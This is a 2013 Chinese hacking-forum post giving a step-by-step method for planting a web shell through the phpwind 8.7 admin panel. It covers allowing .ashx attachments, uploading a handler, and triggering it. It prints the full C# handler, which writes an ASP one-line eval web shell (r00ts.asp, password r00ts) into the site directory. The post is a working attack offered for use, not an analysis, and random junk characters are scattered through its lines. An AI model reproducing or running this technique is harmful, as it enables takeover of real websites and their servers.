找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2427|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小$ I6 U! D! t( D  l" n- q1 t

% z( J2 k+ I3 F% W6 }1 ~群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
( G/ n6 R! b3 g/ G2 M
1 G9 L! h# P8 d+ d- P8 v发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
6 f: W. R; u) c% e4 P+ K, E & m, I/ V7 d1 f9 t! T
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx+ w0 X9 f6 ~0 _7 f
5 [% a* R; |9 C# m
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
; M) S# D1 b/ ^2 Y( D5 \' h
9 D% F5 w* s- J6 Y下面是代码:
0 }  {1 w0 p5 P" j) T0 s3 l6 ?
; Z, x$ z1 k+ ~<%@ WebHandler Language="C#"Class="Handler" %>
1 P: r6 R. ^, |3 f( W4 X0 U$ n2 V7 Xusing System;
3 h# a# [8 I% ?! vusing System.Web;# c: ?' V. t: X/ @  v, P
using System.IO;
/ F5 j8 @; a' p( d, }4 c  Xpublic class Handler : IHttpHandler {
$ c- {( @- T1 K3 V; I: o* Jpublic void ProcessRequest (HttpContext context) {
0 v4 _3 ?5 B# h5 w) acontext.Response.ContentType = "text/plain";
" q& h6 A  \7 {$ ^" g  nStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));* d4 K7 b5 d2 E& f* R! W
file1.Write("<%eval request(\"r00ts\")%>");3 [( o$ ~# E9 o3 m
file1.Flush();; O; ^! v- V5 O' c6 X
file1.Close();
6 v/ Q0 B( j" h0 W}. u1 [1 {& `: O1 v
public bool IsReusable {$ y) ~4 S& i; b4 F' t0 ?* @6 c
get {
- t# X1 x. ~& w/ Y; I2 u0 s" ?; k, Rreturn false;  v6 @; T  V$ }
}* N. w; z5 [& b1 f9 ?
}
+ q. S: p% p& }$ H( U0 A2 x}' m$ H) ]7 h( ~: K; y9 o% E7 Y8 e# w; N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表